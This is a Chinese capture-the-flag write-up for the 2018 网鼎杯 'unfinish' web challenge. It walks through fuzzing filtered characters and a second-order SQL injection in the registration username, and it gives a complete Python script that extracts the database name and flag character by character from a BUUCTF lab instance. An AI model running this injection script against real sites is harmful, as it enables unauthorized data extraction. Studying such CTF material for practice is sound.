网鼎杯-2018-unfinish解题方法

BUUCTF在线评测这里可以解题无需搭建

进入这题后我们会得到这样一个界面

这里我们会发现登录不进去也没有注册界面以及源码,这里我们需要获取它其他的一些界面找注入机会,这里有两种方式找其他界面,一种是猜这里是登录界面那么必定就会有注册界面一般注册界面的名字无非就是reg.php,register.php这是register.php界面当然这种就是靠运气和我们的经验了。第二种是用扫描器去扫,但是这种方式在比赛里通常是不允许的,

 这里我们先随便注册一个用户登录一下

 

登录进去后我们发现只有用户名是可见的,所以我们尝试在用户名进行注入

 这里我们发现注册不了所以可以推断出这里有限制字符所以我们使用burp suite来测出它的限制字符

这里将包发送到intruder中

在username中添加payload的插入点

使用字典来测出限制字符

这里你也可以自己写字典或者从GitHub上找

这里测试出限制了,和information

限制了information和,所以这里我们采用select ’0‘+text+‘0’的语句注入

在mysql中+只是一个运算符所以我们可以用此方式来获取数据库的ascii码值当然这里也可以使用16进制的方式但要注意的一点是如果hex值过长需要进行截断以及如过算出的hex值是字符会被截断因此需要两次16进制转化。

,的问题我们通过from for的方式来替换

 

然后就可以进行注入了

这里我使用一个python脚本进行注入

import requests
import time
from bs4 import BeautifulSoup  # html解析器
# 这是是一个框架,如果你没有下载的话需要下载,是一个爬虫的框架用于精准获取页面的各个数据
# pip install BeautifulSoup(如果你是python3的话则是BeautifulSoup4)# 这里是注入出库名,一般库名都是在10个字节以内如果数据库超过10字节则更改循环的次数
def getDatabase():database = ''# 定义一个变量来记录库名for i in range(10):data_database = {'username': "0'+ascii(substr((select database()) from " + str(i + 1) + " for 1))+'0",# 这里是注入语句'password': 'admin',"email": "admin11@admin.com" + str(i)}# 注册requests.post("http://eea1d6c0-754b-4d0d-93ab-46724eb66608.node5.buuoj.cn:81/register.php", data_database)# 通过requests.post函数来访问并将data_database的数据放入login_data = {# 这里是登录'password': 'admin',"email": "admin11@admin.com" + str(i)}response = requests.post("http://eea1d6c0-754b-4d0d-93ab-46724eb66608.node5.buuoj.cn:81/login.php", login_data)html = response.text  # 返回的页面soup = BeautifulSoup(html, 'html.parser')# 获取界面的各个数据getUsername = soup.find_all('span')[0]  # 获取用户名如果界面内有多个span则以更改后面的数字来获取,从0开始username = getUsername.textif int(username) == 0:breakdatabase += chr(int(username))return database# 获取flag
def getFlag():flag = ''for i in range(60):# 这里也是猜测flag的值是在60为以内,如果超了需要更改data_flag = {'username': "0'+ascii(substr((select * from flag) from " + str(i + 1) + " for 1))+'0",'password': 'admin',"email": "admin32@admin.com" + str(i)}# 注册requests.post("http://eea1d6c0-754b-4d0d-93ab-46724eb66608.node5.buuoj.cn:81/register.php", data_flag)login_data = {'password': 'admin',"email": "admin32@admin.com" + str(i)}response = requests.post("http://eea1d6c0-754b-4d0d-93ab-46724eb66608.node5.buuoj.cn:81/login.php", login_data)html = response.text  # 返回的页面soup = BeautifulSoup(html, 'html.parser')getUsername = soup.find_all('span')[0]  # 获取用户名username = getUsername.textif int(username) == 0:breakflag += chr(int(username))return flagprint(getDatabase())
print(getFlag())

 这里我只注入出了数据库名和flag没有对其他表名进行注入因为会很麻烦其次一般比赛通常也是放着flag中的

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/web/4201.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

网络安全新挑战:通用人工智能(AGI)等级保护指南

通用人工智能(AGI)的发展现状及趋势 随着2023年大语言模型应用的划时代突破,以ChatGPT为杰出代表的此类技术犹如一股洪流,彻底颠覆了人类与机器智能交互的疆界,引领通用人工智能(AGI)步入一个崭…

Flume 搭建和操作使用的详细教程

下载 官网下载: https://flume.apache.org/download.html 安装 基本上不需要做什么配置,下载后解压即可使用!! 下载安装包:apache-flume-1.11.0-bin .tar.gz 上传至 linux 的 /opt/ 目录下 解压至 /opt/apps(可以自定义目录) 修改简短名称(方便配置) 配置环境变量(方…

国家开放大学2024年春《国家赔偿法-山东》形成性考核一二三四终结性考试参考答案

答案:更多答案,请关注【电大搜题】微信公众号 答案:更多答案,请关注【电大搜题】微信公众号 答案:更多答案,请关注【电大搜题】微信公众号 【单选题】张某重伤他人被刑事拘留。一个月后,公…

Vue typescript 获得html 元素

方法一 getElementById or something else <div class"book-navbar-menutree" id"menuTree" name"menuTree"> onMounted(() > { var menu document.getElementById(menuTree) as HTMLElementmenu.innerHTML menuTreeStr.value }) …

[SWPUCTF-2022-新生赛]ez_sql

title:[SWPUCTF 2022 新生赛]ez_sql 审题 根据提示&#xff0c;POST传参 得到假的flag 判断类型 字符型注入 判断列数 发现空格和’or’被过滤 重新构造 nss-1/**/oorrder/**/by/**/4#发现为3个字段 采用联合注入union 爆库 发现union被过滤&#xff0c;双写union绕过 发…

【小迪安全2023】第58天:服务攻防-应用协议设备KibanaZabbix远控向日葵VNCTV

&#x1f36c; 博主介绍&#x1f468;‍&#x1f393; 博主介绍&#xff1a;大家好&#xff0c;我是 hacker-routing &#xff0c;很高兴认识大家~ ✨主攻领域&#xff1a;【渗透领域】【应急响应】 【Java、PHP】 【VulnHub靶场复现】【面试分析】 &#x1f389;点赞➕评论➕收…

腾讯云邮件推送如何设置?群发邮件的技巧?

腾讯云邮件推送功能有哪些&#xff1f;怎么有效使用邮件推送&#xff1f; 腾讯云邮件推送以其稳定、高效的特点&#xff0c;受到了众多企业的青睐。那么&#xff0c;腾讯云邮件推送如何设置呢&#xff1f;又有哪些群发邮件的技巧呢&#xff1f;下面AokSend就来详细探讨一下。 …

C++ ─── 匿名对象+变量的创建顺序

目录 1. 匿名对象&#xff08;临时对象&#xff09; 2. 编译器的优化 3.变量的创建与销毁 1. 匿名对象&#xff08;临时对象&#xff09; 我们先来看有名对象的创建 Date d1; Date d2(2024,4,27);匿名对象的创建 Date(2024,56,1); 生成了一个匿名对象&#xff0c;执行完Da…

photoshop如何使用PS中的吸管工具吸取软件外部的颜色?

第一步&#xff0c;打开PS&#xff0c;随意新建一个画布&#xff0c;或打开一个图片。 第二步&#xff0c;将PS窗口缩小&#xff0c;和外部窗口叠加放置&#xff0c;以露出后面的其它页面。 第三步&#xff0c;选中吸管工具&#xff0c;在PS窗口内单击一点吸取颜色&#xff0c;…

江开2024年春《心理健康 060211》过程性考核作业二参考答案

答案&#xff1a;更多答案&#xff0c;请关注【电大搜题】微信公众号 答案&#xff1a;更多答案&#xff0c;请关注【电大搜题】微信公众号 答案&#xff1a;更多答案&#xff0c;请关注【电大搜题】微信公众号 单选题 1提出理性情绪疗法的心理学家是&#xff08; &a…

1、Flink DataStreamAPI 概述(上)

一、DataStream API 1、概述 1&#xff09;Flink程序剖析 1.Flink程序组成 a&#xff09;Flink程序基本组成 获取一个执行环境&#xff08;execution environment&#xff09;&#xff1b;加载/创建初始数据&#xff1b;指定数据相关的转换&#xff1b;指定计算结果的存储…

SpringBoot 缓存

个人简介&#xff1a;Java领域新星创作者&#xff1b;阿里云技术博主、星级博主、专家博主&#xff1b;正在Java学习的路上摸爬滚打&#xff0c;记录学习的过程~ 个人主页&#xff1a;.29.的博客 学习社区&#xff1a;进去逛一逛~ 目录 一、缓存的作用二、SpringBoot启用缓存三…

STM32单片机通过ST-Link 烧录和调试

系列文章目录 STM32单片机系列专栏 C语言术语和结构总结专栏 文章目录 1. ST-LINK V2 2. 操作步骤 2.1 连接方式 2.2 驱动安装常规步骤 2.3 Keil中的设置 3. 调式仿真 4. 常见问题排查 1. ST-LINK V2 ST LINK v2下载器用于STM32单片机&#xff0c;可以下载程序、调试…

c++并查集

文章目录 前言一、并查集1、并查集原理2、并查集实现3、并查集应用1.省份数量2.等式方程的可满足性 前言 一、并查集 1、并查集原理 在一些应用问题中&#xff0c;需要将n个不同的元素划分成一些不相交的集合。开始时&#xff0c;每个元素自成一个单元素集合&#xff0c;然后…

机器视觉检测技术是什么?突出的亮点有哪些?

机器视觉检测技术是一种利用图像处理软件分析处理相机捕捉到的图像&#xff0c;以替代人眼在制造和测试过程中进行检测和测量的技术。它广泛应用于工业自动化领域&#xff0c;可以提高生产效率和质量控制的精度。机器视觉系统通常包括光源、相机、图像处理单元和执行机构等组成…

如何链接多个modbus_tcp设备,并将设备数据写入同一个modbusSlave,以便外部客户端获取所有链接设备的数据。

在modbus通信中&#xff0c;一个modbus服务器一次只能链接一个客户机&#xff0c;那么&#xff0c;外部客户端要获取多个设备的modbus数据&#xff0c;就需要使用链接一个专用的mosbus服务器&#xff0c;一下就是详细解决方法。 第一步&#xff1a;创建modbus客户端&#xff0…

组合总数 python

‘’已知—个无重复元素的序列,给定—个目标数,找出序列中所有可以使数字和未目标数的组合。 序列中的元素可以被多次选用,不能出现重复的组合, 序列中的元素和目标数都是正整数。 例如序列 [2, 3, 5]&#xff0c; 目标值为8&#xff0c; 最终的组合有 &#xff08;2, 3, 3&am…

nvm基本使用

nvm基本使用 文章目录 nvm基本使用1.基本介绍2.下载地址3.常用指令 1.基本介绍 NVM是一个用于管理 Node.js 版本的工具。它允许您在同一台计算机上同时安装和管理多个 Node.js 版本&#xff0c;针对于不同的项目可能需要不同版本的 Node.js 运行环境。 NVM 主要功能&#xff…

嵌入式学习——C语言基础——day10

1. 指针的基本概念 1.1 地址 用来区别不同内存字节空间的编号 1.2 指针 地址就是指针&#xff0c;指针就是地址&#xff0c;地址是一个编号&#xff0c;指针多了指向的概念 1.3 指针变量 用来存放指针的变量&#xff0c;有时将指针变量简称为指针 2. 指针相关运算符 & …

24深圳杯AC题完整思路+可执行代码+参考论文!!!!

比赛题目的完整版思路可执行代码数据参考论文都会在第一时间更新上传的&#xff0c;大家可以参考我往期的资料&#xff0c;所有的资料数据以及到最后更新的参考论文都是一次付费后续免费的。注意&#xff1a;&#xff08;建议先下单占坑&#xff0c;因为随着后续我们更新资料数…